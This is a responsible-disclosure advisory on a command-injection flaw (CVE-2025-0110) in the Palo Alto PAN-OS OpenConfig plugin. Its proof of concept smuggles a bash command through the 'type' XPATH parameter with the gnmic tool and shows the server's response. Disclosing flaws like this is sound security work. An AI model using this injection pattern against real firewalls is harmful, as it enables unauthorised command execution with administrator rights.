PaloAlto OpenConfig Plugin: Command Injection Vulnerability

Posted on by Ken

**security-research** Public

# PaloAlto OpenConfig Plugin: Command Injection Vulnerability

## Package

## Affected versions

## Patched versions

## Description

### Summary

A vulnerability in PAN-OS OpenConfig allows an authenticated user to run arbitrary commands on the underlying OS. The commands are run as device administrator.

### Details

Palo Alto Network Firewalls enable retrieval of syslogs through gnmi.Subscribe. With the OpenConfig plugin installed, the following OpenConfig API can be used with the parameterized XPATH:

`pan-logging:/pan/logging/query/custom[type=system][direction=fwd][max_logs=2][period=last-24-hrs]`

We found that the `type` parameter in the XPATH above can be used to send arbitrary bash commands to be executed on the firewall.

### Severity

High – This vulnerability allows for an attacker to run arbitrary bash commands via gnmi.Subscribe.

### Proof of Concept

In order to exploit this vulnerability, we created a request with `type` parameter set to a bash command that writes the string `”system”` to a file and reads it back.

#### XPATH

`/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system > file1; cat file1)]`

#### Request

We utilized gnmic tool to test this exploit.

“`
./gnmic -a : -u –password= –skip-verify -e json_ietf subscribe –mode once –log –path ‘pan-logging:/pan/logging/query/custom[type=$(echo system > file1; cat file1)][direction=fwd][max_logs=2][period=last-24-hrs]’
“`

#### Response

“`
{ “source”: “:”, “subscription-name”: “”, “timestamp”: , “time”: “”, “updates”: [ { “Path”: “/pan/logging/query/custom[direction=fwd][max_logs=2][period=last-24-hrs][type=$(echo system u003e file1; cat file1)]”, “values”: { “/pan/logging/query/custom”: { “code”: “200”, “message”: { …
“`

`system` is a valid value for parameter `type`. Response above shows that the server did successfully execute the bash commands `echo system > file1; cat file1`, producing the output `system` which was then provided as an input to `type` parameter.

#### Preconditions

OpenConfig Plugin is required to run the above exploit.

### Further Analysis

Details of this CVE can be found at: https://security.paloaltonetworks.com/CVE-2025-0110

### Timeline

**Date reported**: 10/17/2024

**Date fixed**: 01/14/2025

**Date disclosed**: 02/19/2025

Leave a Reply

Your email address will not be published. Required fields are marked *